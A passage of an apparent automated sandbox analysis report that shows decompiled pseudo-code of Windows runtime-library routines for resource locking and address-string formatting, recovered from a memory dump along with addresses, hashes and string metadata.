													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01F84FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01F93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FC217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01F93F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01F83915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F65384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F3F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01F83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F3F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01F83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F3F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01F83915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E01F65329(_t110, _t138);
																return E01F653A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                                        0x01f8055a
                                                                                        0x01f8055d
                                                                                        0x01f80563
                                                                                        0x01f80566
                                                                                        0x01f805d8
                                                                                        0x01f805e2
                                                                                        0x01f805e5
                                                                                        0x00000000
                                                                                        0x01f805e7
                                                                                        0x01f805e7
                                                                                        0x01f805ea
                                                                                        0x01f805f3
                                                                                        0x01f805f3
                                                                                        0x01f80568
                                                                                        0x01f80568
                                                                                        0x01f80568
                                                                                        0x01f80569
                                                                                        0x01f80569
                                                                                        0x01f80569
                                                                                        0x01f8056b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa217f
                                                                                        0x01fa2183
                                                                                        0x01fa225b
                                                                                        0x01fa225f
                                                                                        0x01fa2189
                                                                                        0x01fa218c
                                                                                        0x01fa218f
                                                                                        0x01fa2194
                                                                                        0x01fa2199
                                                                                        0x01fa219d
                                                                                        0x01fa21a0
                                                                                        0x01fa21a2
                                                                                        0x01fa21ce
                                                                                        0x01fa21ce
                                                                                        0x01fa21ce
                                                                                        0x01fa21d0
                                                                                        0x01fa21d6
                                                                                        0x01fa21de
                                                                                        0x01fa21e2
                                                                                        0x01fa21e8
                                                                                        0x01fa21e9
                                                                                        0x01fa21ec
                                                                                        0x01fa21f1
                                                                                        0x01fa21f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21f8
                                                                                        0x01fa21fb
                                                                                        0x01fa2206
                                                                                        0x01fa220b
                                                                                        0x01fa220c
                                                                                        0x01fa2217
                                                                                        0x01fa2226
                                                                                        0x01fa222b
                                                                                        0x01fa222c
                                                                                        0x01fa222f
                                                                                        0x01fa2232
                                                                                        0x01fa2235
                                                                                        0x01fa2235
                                                                                        0x01fa223a
                                                                                        0x01fa223f
                                                                                        0x01fa2241
                                                                                        0x01fa2243
                                                                                        0x01fa2248
                                                                                        0x01fa2248
                                                                                        0x01fa224d
                                                                                        0x01fa224f
                                                                                        0x01fa2262
                                                                                        0x01fa2263
                                                                                        0x01fa2268
                                                                                        0x01fa2269
                                                                                        0x01fa2269
                                                                                        0x01fa2269
                                                                                        0x01fa226d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2276
                                                                                        0x01fa2279
                                                                                        0x01fa227e
                                                                                        0x01fa2283
                                                                                        0x01fa2287
                                                                                        0x01fa228a
                                                                                        0x01fa228d
                                                                                        0x01fa228f
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22be
                                                                                        0x01fa22c4
                                                                                        0x01fa22cc
                                                                                        0x01fa22d0
                                                                                        0x01fa22d6
                                                                                        0x01fa22d7
                                                                                        0x01fa22da
                                                                                        0x01fa22df
                                                                                        0x01fa22e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22e6
                                                                                        0x01fa22e9
                                                                                        0x01fa22f4
                                                                                        0x01fa22f9
                                                                                        0x01fa22fa
                                                                                        0x01fa2305
                                                                                        0x01fa2314
                                                                                        0x01fa2319
                                                                                        0x01fa231a
                                                                                        0x01fa231d
                                                                                        0x01fa2320
                                                                                        0x01fa2323
                                                                                        0x01fa2323
                                                                                        0x01fa2328
                                                                                        0x01fa232d
                                                                                        0x01fa232f
                                                                                        0x01fa2331
                                                                                        0x01fa2336
                                                                                        0x01fa2336
                                                                                        0x01fa233b
                                                                                        0x01fa233d
                                                                                        0x01fa2350
                                                                                        0x01fa2351
                                                                                        0x01fa2356
                                                                                        0x01fa2359
                                                                                        0x01fa2359
                                                                                        0x01fa235b
                                                                                        0x01fa235d
                                                                                        0x01f65367
                                                                                        0x01f6536b
                                                                                        0x01f65372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2363
                                                                                        0x01fa2363
                                                                                        0x01fa2369
                                                                                        0x01fa236a
                                                                                        0x01fa236c
                                                                                        0x01fa2371
                                                                                        0x01fa2373
                                                                                        0x00000000
                                                                                        0x01fa2379
                                                                                        0x01fa2379
                                                                                        0x01fa237a
                                                                                        0x01fa237f
                                                                                        0x01fa237f
                                                                                        0x01fa2385
                                                                                        0x01fa2386
                                                                                        0x01fa2389
                                                                                        0x01fa238e
                                                                                        0x01fa2390
                                                                                        0x01f65378
                                                                                        0x01f6537c
                                                                                        0x01fa2396
                                                                                        0x01fa2396
                                                                                        0x01fa2397
                                                                                        0x01fa239c
                                                                                        0x01fa23a2
                                                                                        0x01fa23a3
                                                                                        0x01fa23a6
                                                                                        0x01fa23ab
                                                                                        0x01fa23ad
                                                                                        0x00000000
                                                                                        0x01fa23b3
                                                                                        0x01fa23b3
                                                                                        0x01fa23b4
                                                                                        0x01fa23b9
                                                                                        0x01fa23ba
                                                                                        0x01fa23ba
                                                                                        0x01fa23bc
                                                                                        0x01fa23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f99153
                                                                                        0x01f99158
                                                                                        0x01f9915a
                                                                                        0x01f9915e
                                                                                        0x01f99160
                                                                                        0x00000000
                                                                                        0x01f99166
                                                                                        0x01f99166
                                                                                        0x01f99171
                                                                                        0x01f99176
                                                                                        0x01f99176
                                                                                        0x00000000
                                                                                        0x01f99160
                                                                                        0x01fa23c6
                                                                                        0x01fa23d7
                                                                                        0x01fa23d7
                                                                                        0x01fa23ad
                                                                                        0x01fa2390
                                                                                        0x01fa2373
                                                                                        0x01fa233f
                                                                                        0x01fa233f
                                                                                        0x00000000
                                                                                        0x01fa233f
                                                                                        0x01fa2291
                                                                                        0x01fa2291
                                                                                        0x01fa2293
                                                                                        0x01fa2295
                                                                                        0x01fa229a
                                                                                        0x01fa22a1
                                                                                        0x01fa22a3
                                                                                        0x01fa22a7
                                                                                        0x01fa22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22ab
                                                                                        0x01fa22ad
                                                                                        0x01fa22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22af
                                                                                        0x01fa22b1
                                                                                        0x01fa22b4
                                                                                        0x01fa22b4
                                                                                        0x01fa22b6
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f653cb
                                                                                        0x01f653ce
                                                                                        0x01f653d0
                                                                                        0x01f653d4
                                                                                        0x01f653d6
                                                                                        0x00000000
                                                                                        0x01f653d8
                                                                                        0x01f653e3
                                                                                        0x01f653ea
                                                                                        0x01f653ea
                                                                                        0x00000000
                                                                                        0x01f653d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22b6
                                                                                        0x00000000
                                                                                        0x01fa228f
                                                                                        0x01fa2349
                                                                                        0x01fa234d
                                                                                        0x01fa2251
                                                                                        0x01fa2251
                                                                                        0x00000000
                                                                                        0x01fa2251
                                                                                        0x01fa21a4
                                                                                        0x01fa21a4
                                                                                        0x01fa21a6
                                                                                        0x01fa21a8
                                                                                        0x01fa21ac
                                                                                        0x01fa21b6
                                                                                        0x01fa21b8
                                                                                        0x01fa21bc
                                                                                        0x01fa21be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c0
                                                                                        0x01fa21c2
                                                                                        0x01fa21c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c4
                                                                                        0x01fa21c6
                                                                                        0x01fa21c6
                                                                                        0x01fa21c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c8
                                                                                        0x01fa21a2
                                                                                        0x00000000
                                                                                        0x01fa2183
                                                                                        0x01f8057b
                                                                                        0x01f8057d
                                                                                        0x01f80581
                                                                                        0x01f80583
                                                                                        0x01fa2178
                                                                                        0x00000000
                                                                                        0x01f80589
                                                                                        0x01f8058f
                                                                                        0x01f8058f
                                                                                        0x01f80583
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FA2206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-4236105082
                                                                                        • Opcode ID: fe76a3ed8006e629cfbbc75e462dd826806c443d9d0fd95f1ce11d9fa40bc8c4
                                                                                        • Instruction ID: dba03aa5b62f4d87054bccfd8b6c04b66f22ebcdaa653e6fa0053151d9c07c8b
                                                                                        • Opcode Fuzzy Hash: fe76a3ed8006e629cfbbc75e462dd826806c443d9d0fd95f1ce11d9fa40bc8c4
                                                                                        • Instruction Fuzzy Hash: F0513975B00212ABFB19DE18CC81F6677A9AFD4710F214219FD55DF285D937EC4287A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E01F814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2022088; // 0x76801594
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01F77707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01F813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01F77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01F77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01F42340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01F4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                        0x01f814c0
                                                                                        0x01f814cb
                                                                                        0x01f814d2
                                                                                        0x01f814d6
                                                                                        0x01f814da
                                                                                        0x01f814de
                                                                                        0x01f814e3
                                                                                        0x01f8157a
                                                                                        0x01f8157a
                                                                                        0x01f814f1
                                                                                        0x01f814f3
                                                                                        0x01faea0f
                                                                                        0x00000000
                                                                                        0x01faea15
                                                                                        0x00000000
                                                                                        0x01faea15
                                                                                        0x01f814f9
                                                                                        0x01f814f9
                                                                                        0x01f814fe
                                                                                        0x01f81504
                                                                                        0x01faea1a
                                                                                        0x01faea1f
                                                                                        0x01faea21
                                                                                        0x01faea22
                                                                                        0x01faea27
                                                                                        0x01faea2a
                                                                                        0x01faea2a
                                                                                        0x01f81515
                                                                                        0x01f81517
                                                                                        0x01f8156d
                                                                                        0x01f81572
                                                                                        0x01f81575
                                                                                        0x01f81575
                                                                                        0x01f8151e
                                                                                        0x01faea50
                                                                                        0x01faea55
                                                                                        0x01faea58
                                                                                        0x01faea58
                                                                                        0x01f8152e
                                                                                        0x01f81531
                                                                                        0x01f81533
                                                                                        0x00000000
                                                                                        0x01f81535
                                                                                        0x01f81541
                                                                                        0x01f81549
                                                                                        0x01f81549
                                                                                        0x01f81533
                                                                                        0x01f814f3
                                                                                        0x01f81559

                                                                                        APIs
                                                                                        • ___swprintf_l.LIBCMT ref: 01FAEA22
                                                                                          • Part of subcall function 01F813CB: ___swprintf_l.LIBCMT ref: 01F8146B
                                                                                          • Part of subcall function 01F813CB: ___swprintf_l.LIBCMT ref: 01F81490
                                                                                        • ___swprintf_l.LIBCMT ref: 01F8156D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: 88b379c9eb7316b274c94e0852cd1edcd34f730460502d3f33e4325898458c35
                                                                                        • Instruction ID: 93296927a50b33a42ea614b707deb158a39ee0fa617e070863ae33a42792d156
                                                                                        • Opcode Fuzzy Hash: 88b379c9eb7316b274c94e0852cd1edcd34f730460502d3f33e4325898458c35
                                                                                        • Instruction Fuzzy Hash: BB21D1B2D0021A9FDB21EE58CC44AEB77BCBB50300F484616ED46D7101DB76EA5A8BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E01F653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020201c0;
									_push(_t92);
									_push(0);
									_t37 = E01F3F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01F84FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01F93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01FC217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F93F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01F83915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F65384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01F3F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01F83915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01F3F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01F83915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01F3F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01F83915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E01F65329(_t74, _t92);
													_push(1);
													return E01F653A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                                                        0x01f653ab
                                                                                        0x01f653ae
                                                                                        0x01f653b1
                                                                                        0x01f653b4
                                                                                        0x01f653b7
                                                                                        0x01f805b6
                                                                                        0x01f805c0
                                                                                        0x01f805c3
                                                                                        0x00000000
                                                                                        0x01f805c9
                                                                                        0x01f805c9
                                                                                        0x01f805cc
                                                                                        0x01f805d5
                                                                                        0x01f805d5
                                                                                        0x01f653bd
                                                                                        0x01f653bd
                                                                                        0x01f653bd
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653be
                                                                                        0x01f653c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2269
                                                                                        0x01fa226d
                                                                                        0x01fa2349
                                                                                        0x01fa234d
                                                                                        0x01fa2273
                                                                                        0x01fa2276
                                                                                        0x01fa2279
                                                                                        0x01fa227e
                                                                                        0x01fa2283
                                                                                        0x01fa2287
                                                                                        0x01fa228a
                                                                                        0x01fa228d
                                                                                        0x01fa228f
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22bc
                                                                                        0x01fa22be
                                                                                        0x01fa22c4
                                                                                        0x01fa22cc
                                                                                        0x01fa22d0
                                                                                        0x01fa22d6
                                                                                        0x01fa22d7
                                                                                        0x01fa22da
                                                                                        0x01fa22df
                                                                                        0x01fa22e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22e6
                                                                                        0x01fa22e9
                                                                                        0x01fa22f4
                                                                                        0x01fa22f9
                                                                                        0x01fa22fa
                                                                                        0x01fa2305
                                                                                        0x01fa2314
                                                                                        0x01fa2319
                                                                                        0x01fa231a
                                                                                        0x01fa231d
                                                                                        0x01fa2320
                                                                                        0x01fa2323
                                                                                        0x01fa2323
                                                                                        0x01fa2328
                                                                                        0x01fa232d
                                                                                        0x01fa232f
                                                                                        0x01fa2331
                                                                                        0x01fa2336
                                                                                        0x01fa2336
                                                                                        0x01fa233b
                                                                                        0x01fa233d
                                                                                        0x01fa2350
                                                                                        0x01fa2351
                                                                                        0x01fa2356
                                                                                        0x01fa2359
                                                                                        0x01fa2359
                                                                                        0x01fa235b
                                                                                        0x01fa235d
                                                                                        0x01f65367
                                                                                        0x01f6536b
                                                                                        0x01f65372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa2363
                                                                                        0x01fa2363
                                                                                        0x01fa2369
                                                                                        0x01fa236a
                                                                                        0x01fa236c
                                                                                        0x01fa2371
                                                                                        0x01fa2373
                                                                                        0x00000000
                                                                                        0x01fa2379
                                                                                        0x01fa2379
                                                                                        0x01fa237a
                                                                                        0x01fa237f
                                                                                        0x01fa237f
                                                                                        0x01fa2385
                                                                                        0x01fa2386
                                                                                        0x01fa2389
                                                                                        0x01fa238e
                                                                                        0x01fa2390
                                                                                        0x01f65378
                                                                                        0x01f6537c
                                                                                        0x01fa2396
                                                                                        0x01fa2396
                                                                                        0x01fa2397
                                                                                        0x01fa239c
                                                                                        0x01fa23a2
                                                                                        0x01fa23a3
                                                                                        0x01fa23a6
                                                                                        0x01fa23ab
                                                                                        0x01fa23ad
                                                                                        0x00000000
                                                                                        0x01fa23b3
                                                                                        0x01fa23b3
                                                                                        0x01fa23b4
                                                                                        0x01fa23b9
                                                                                        0x01fa23ba
                                                                                        0x01fa23ba
                                                                                        0x01fa23bc
                                                                                        0x01fa23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f99153
                                                                                        0x01f99158
                                                                                        0x01f9915a
                                                                                        0x01f9915e
                                                                                        0x01f99160
                                                                                        0x00000000
                                                                                        0x01f99166
                                                                                        0x01f99166
                                                                                        0x01f99171
                                                                                        0x01f99176
                                                                                        0x01f99176
                                                                                        0x00000000
                                                                                        0x01f99160
                                                                                        0x01fa23c6
                                                                                        0x01fa23cb
                                                                                        0x01fa23d7
                                                                                        0x01fa23d7
                                                                                        0x01fa23ad
                                                                                        0x01fa2390
                                                                                        0x01fa2373
                                                                                        0x01fa233f
                                                                                        0x01fa233f
                                                                                        0x00000000
                                                                                        0x01fa233f
                                                                                        0x01fa2291
                                                                                        0x01fa2291
                                                                                        0x01fa2293
                                                                                        0x01fa2295
                                                                                        0x01fa229a
                                                                                        0x01fa22a1
                                                                                        0x01fa22a3
                                                                                        0x01fa22a7
                                                                                        0x01fa22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22ab
                                                                                        0x01fa22ad
                                                                                        0x01fa22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22af
                                                                                        0x01fa22b1
                                                                                        0x01fa22b4
                                                                                        0x01fa22b4
                                                                                        0x01fa22b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
